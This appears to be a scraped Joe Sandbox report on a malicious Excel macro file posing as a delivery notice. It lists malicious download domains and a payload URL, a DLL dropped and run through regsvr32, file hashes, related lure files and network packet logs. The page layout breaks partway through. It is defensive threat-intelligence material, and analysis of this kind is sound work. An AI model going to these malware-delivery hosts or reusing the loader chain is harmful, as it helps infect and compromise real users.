http://o.ss2.us/0 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://aws.amazon.com/search/?searchQuery= | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://a0.awsstatic.com/libra-search/1.0.13/js | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/privacy/?nc1=f_pr | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/pt/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/jp/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | - | high
https://aws.amazon.com/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp | false | - |
                                                                                                                                        high
                                                                                                                                        http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://aws.amazon.com/jp/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://crt.rootg2.amazontrust.com/rootg2.cer0=regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://aws.amazon.com/pt/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://aws.amazon.com/lrregsvr32.exe, 00000004.00000003.2093300984.0000000000276000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://aws.amazon.com/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.htmlregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://aws.amazon.com/es/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.icra.org/vocabulary/.regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://d1.awsstatic.comregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://aws.amazon.com/de/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://investor.msn.com/regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://aws.amazon.com/id/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.pngregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.%s.comPAregsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            low
                                                                                                                                                                            https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=defaultregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://a0.awsstatic.comregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://s.ss2.us/r.crl0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.198.51 | thousandsyears.download | United States | 13335 | CLOUDFLARENETUS | false
13.224.92.73 | dr49lng3n1n2s.cloudfront.net | United States | 16509 | AMAZON-02US | false
104.21.55.83 | uppercilio.fun | United States | 13335 | CLOUDFLARENETUS | false
172.67.213.115 | astrocycle.download | United States | 13335 | CLOUDFLARENETUS | true
172.67.194.117 | voopeople.fun | United States | 13335 | CLOUDFLARENETUS | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 444803
Start date: 06.07.2021
Start time: 17:42:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 5s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Outfordelivery389402.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 70.6% (good quality ratio 56.6%)
• Quality average: 70.2%
• Quality standard deviation: 40%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 12
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/444803/sample/Outfordelivery389402.xlsm

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
172.67.198.51 | LL52387-01-F4448869.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | HRScheduleH3965005.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | PI-9823472110866.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | uhr908723097306.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Vac.list07-2021-6014910.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Vac.list07-20214862208.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | List-4527768.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | HRcontacts7752205.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | sbf0127365-7431059.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Outfordelivery799862.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Purchaseconfirmation-137606.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | DeliveryConf535215.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | PI-210610.xlsm | Get hash | malicious | Browse | thousandsyears.download/div/44376,8555986111.jpg
13.224.92.73 | LL52387-01-F4448869.xlsm | Get hash | malicious | Browse |
13.224.92.73 | Schedule-982347-Y6844315.xlsm | Get hash | malicious | Browse |
13.224.92.73 | HRScheduleH3965005.xlsm | Get hash | malicious | Browse |
13.224.92.73 | sbf0127365-7431059.xlsm | Get hash | malicious | Browse |
13.224.92.73 | Outfordelivery799862.xlsm | Get hash | malicious | Browse |
13.224.92.73 | Purchaseconfirmation-137606.xlsm | Get hash | malicious | Browse |
13.224.92.73 | DeliveryConf535215.xlsm | Get hash | malicious | Browse |

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
voopeople.fun | LL52387-01-F4448869.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | Schedule-982347-Y6844315.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | HRScheduleH3965005.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | PI-9823472110866.xlsm | Get hash | malicious | Browse | 104.21.12.122
voopeople.fun | uhr908723097306.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | Vac.list07-2021-6014910.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | Vac.list07-20214862208.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | List-4527768.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | HRcontacts7752205.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | Formtofill4184860.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | sbf0127365-7431059.xlsm | Get hash | malicious | Browse | 104.21.12.122
voopeople.fun | Outfordelivery799862.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | Purchaseconfirmation-137606.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | DeliveryConf535215.xlsm | Get hash | malicious | Browse | 172.67.194.117
voopeople.fun | PI-210610.xlsm | Get hash | malicious | Browse | 172.67.194.117
thousandsyears.download | LL52387-01-F4448869.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | Schedule-982347-Y6844315.xlsm | Get hash | malicious | Browse | 104.21.52.111
thousandsyears.download | HRScheduleH3965005.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | PI-9823472110866.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | uhr908723097306.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | Vac.list07-2021-6014910.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | Vac.list07-20214862208.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | List-4527768.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | HRcontacts7752205.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | Formtofill4184860.xlsm | Get hash | malicious | Browse | 104.21.52.111
thousandsyears.download | sbf0127365-7431059.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | Outfordelivery799862.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | Purchaseconfirmation-137606.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | DeliveryConf535215.xlsm | Get hash | malicious | Browse | 172.67.198.51
thousandsyears.download | PI-210610.xlsm | Get hash | malicious | Browse | 172.67.198.51
uppercilio.fun | LL52387-01-F4448869.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | Schedule-982347-Y6844315.xlsm | Get hash | malicious | Browse | 172.67.146.88
uppercilio.fun | HRScheduleH3965005.xlsm | Get hash | malicious | Browse | 172.67.146.88
uppercilio.fun | PI-9823472110866.xlsm | Get hash | malicious | Browse | 172.67.146.88
uppercilio.fun | uhr908723097306.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | Vac.list07-2021-6014910.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | Vac.list07-20214862208.xlsm | Get hash | malicious | Browse | 172.67.146.88
uppercilio.fun | List-4527768.xlsm | Get hash | malicious | Browse | 172.67.146.88
uppercilio.fun | HRcontacts7752205.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | Formtofill4184860.xlsm | Get hash | malicious | Browse | 172.67.146.88
uppercilio.fun | sbf0127365-7431059.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | Outfordelivery799862.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | Purchaseconfirmation-137606.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | DeliveryConf535215.xlsm | Get hash | malicious | Browse | 104.21.55.83
uppercilio.fun | PI-210610.xlsm | Get hash | malicious | Browse | 104.21.55.83

ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | PO No.179989 - Hörmann Mexico S.a.de C.v..exe | malicious | 104.21.19.200
  | LL52387-01-F4448869.xlsm | malicious | 172.67.194.117
  | 13076885-RFQ.doc | malicious | 104.21.19.200
  | Schedule-982347-Y6844315.xlsm | malicious | 172.67.194.117
  | HRScheduleH3965005.xlsm | malicious | 172.67.194.117
  | Cava.com_Fax-Message.htm | malicious | 104.16.18.94
  | VM52MC9YQDUO0P.html | malicious | 104.16.18.94
  | PI-9823472110866.xlsm | malicious | 104.21.12.122
  | uhr908723097306.xlsm | malicious | 172.67.194.117
  | Vac.list07-2021-6014910.xlsm | malicious | 172.67.194.117
  | Vac.list07-20214862208.xlsm | malicious | 172.67.194.117
  | List-4527768.xlsm | malicious | 172.67.194.117
  | HRcontacts7752205.xlsm | malicious | 172.67.194.117
  | Formtofill4184860.xlsm | malicious | 172.67.194.117
  | sbf0127365-7431059.xlsm | malicious | 104.21.12.122
  | runsys32.dll | malicious | 104.20.185.68
  | Outfordelivery799862.xlsm | malicious | 172.67.194.117
  | Purchaseconfirmation-137606.xlsm | malicious | 172.67.194.117
  | DeliveryConf535215.xlsm | malicious | 172.67.194.117
  | SMR8OzIgNB.exe | malicious | 104.21.8.151
AMAZON-02US | 3456_RFQ998778.xlsx | malicious | 52.58.78.16
  | LL52387-01-F4448869.xlsm | malicious | 13.224.92.73
  | Schedule-982347-Y6844315.xlsm | malicious | 13.224.92.73
  | HRScheduleH3965005.xlsm | malicious | 13.224.92.73
  | Enquiry#List For Order070621.exe | malicious | 13.59.53.244
  | PI-9823472110866.xlsm | malicious | 143.204.91.74
  | uhr908723097306.xlsm | malicious | 143.204.91.74
  | Vac.list07-2021-6014910.xlsm | malicious | 143.204.91.74
  | Vac.list07-20214862208.xlsm | malicious | 143.204.91.74
  | List-4527768.xlsm | malicious | 13.225.75.73
  | HRcontacts7752205.xlsm | malicious | 13.225.75.73
  | Formtofill4184860.xlsm | malicious | 13.225.75.73
  | sbf0127365-7431059.xlsm | malicious | 13.224.92.73
  | Reciept 19129475.xlsb | malicious | 54.191.98.150
  | Outfordelivery799862.xlsm | malicious | 13.224.92.73
  | Purchaseconfirmation-137606.xlsm | malicious | 13.224.92.73
  | DeliveryConf535215.xlsm | malicious | 13.224.92.73
  | PI-210610.xlsm | malicious | 143.204.4.74
  | GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msi | malicious | 18.231.168.212
  | 39d0c1e7.msi | malicious | 3.143.159.48

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
05af1f5ca1b87cc9cc9b25185115607d | LL52387-01-F4448869.xlsm | malicious | 13.224.92.73
  | 13076885-RFQ.doc | malicious | 13.224.92.73
  | Schedule-982347-Y6844315.xlsm | malicious | 13.224.92.73
  | HRScheduleH3965005.xlsm | malicious | 13.224.92.73
  | PI-9823472110866.xlsm | malicious | 13.224.92.73
  | uhr908723097306.xlsm | malicious | 13.224.92.73
  | Vac.list07-2021-6014910.xlsm | malicious | 13.224.92.73
  | Vac.list07-20214862208.xlsm | malicious | 13.224.92.73
  | List-4527768.xlsm | malicious | 13.224.92.73
  | HRcontacts7752205.xlsm | malicious | 13.224.92.73
  | Formtofill4184860.xlsm | malicious | 13.224.92.73
  | sbf0127365-7431059.xlsm | malicious | 13.224.92.73
  | Outfordelivery799862.xlsm | malicious | 13.224.92.73
  | Purchaseconfirmation-137606.xlsm | malicious | 13.224.92.73
  | DeliveryConf535215.xlsm | malicious | 13.224.92.73
  | PI-210610.xlsm | malicious | 13.224.92.73
  | 108020075.exe | malicious | 13.224.92.73
  | G-DECL G50 EURL.xlsx | malicious | 13.224.92.73
  | 1.doc | malicious | 13.224.92.73
  | DECL G50 EURL!.xlsx | malicious | 13.224.92.73

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml | LL52387-01-F4448869.xlsm | malicious
  | Schedule-982347-Y6844315.xlsm | malicious
  | HRScheduleH3965005.xlsm | malicious
  | PI-9823472110866.xlsm | malicious
  | uhr908723097306.xlsm | malicious
  | Vac.list07-2021-6014910.xlsm | malicious
  | Vac.list07-20214862208.xlsm | malicious
  | List-4527768.xlsm | malicious
  | HRcontacts7752205.xlsm | malicious
  | Formtofill4184860.xlsm | malicious
  | sbf0127365-7431059.xlsm | malicious
  | Outfordelivery799862.xlsm | malicious
  | Purchaseconfirmation-137606.xlsm | malicious
  | DeliveryConf535215.xlsm | malicious
  | PI-210610.xlsm | malicious

                                                                                                                                                                                                                              Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View (same file seen in other samples):
• Filename: LL52387-01-F4448869.xlsm, Detection: malicious
• Filename: Schedule-982347-Y6844315.xlsm, Detection: malicious
• Filename: HRScheduleH3965005.xlsm, Detection: malicious
• Filename: PI-9823472110866.xlsm, Detection: malicious
• Filename: uhr908723097306.xlsm, Detection: malicious
• Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious
• Filename: Vac.list07-20214862208.xlsm, Detection: malicious
• Filename: List-4527768.xlsm, Detection: malicious
• Filename: HRcontacts7752205.xlsm, Detection: malicious
• Filename: Formtofill4184860.xlsm, Detection: malicious
• Filename: sbf0127365-7431059.xlsm, Detection: malicious
• Filename: Outfordelivery799862.xlsm, Detection: malicious
• Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Filename: DeliveryConf535215.xlsm, Detection: malicious
• Filename: PI-210610.xlsm, Detection: malicious
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1E52D1C.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 174009
Entropy (8bit): 7.967231122944825
Encrypted: false
SSDEEP: 3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
MD5: C0AF15BAE70AFFC4BE7625110AEEF09A
SHA1: AEF94E038F0538C812AAF9EF605F76AF2376A26D
SHA-256: D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
SHA-512: 131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\Desktop\~$Outfordelivery389402.xlsm
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
MD5: 797869BB881CFBCDAC2064F92B26E46F
SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\XTOWN.dll
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Reputation: moderate, very likely benign file

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.939406643356395
TrID:
• Excel Microsoft Office Open XML Format document (40004/1) 83.33%
• ZIP compressed archive (8000/1) 16.67%
File name: Outfordelivery389402.xlsm
File size: 189905
MD5: acdff723834c2096a2b6cf764530a39d
SHA1: f73118a481aff1b466d3357ed80ad5dda7bdb082
SHA256: 236813afbb9c8784ac18f4653ee4933de94941b17cce4dad97ed1f21d61eb5b1
SHA512: 94b100d28791896c7de5a5d41774eca9dc778f9eee657ce25b9342d03a40a4a59214849cf791027e35dab5e040d1750ef93a1aa2699c59f021236c4a8a8f2884
SSDEEP: 3072:2DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:0RcGUlFzy4mpTHdrUc3/SsYASx

File Icon

Icon Hash: e4e2aa8aa4bcbcac

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                          Source Port  Dest Port  Source IP       Dest IP
Jul 6, 2021 17:43:24.534848928 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:43:24.575633049 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:43:24.575748920 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:43:24.577158928 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:43:24.615283966 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:43:24.636230946 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:43:24.636265993 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:43:24.638490915 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:43:24.730370045 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:43:24.768527031 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.768604040 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:43:24.769382000 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:43:24.809086084 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.843807936 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.843856096 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.843868017 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.843878984 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.845310926 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.845335007 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.845345974 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:43:24.845357895 CEST  80           49168      172.67.194.117  192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845370054 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845380068 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845390081 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845401049 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845550060 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.846951962 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.846963882 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.846976042 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.847402096 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.847693920 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.847728968 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.847779989 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.847785950 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.847789049 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.848364115 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.848387957 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.848469973 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.848942041 CEST4916880192.168.2.22172.67.194.117
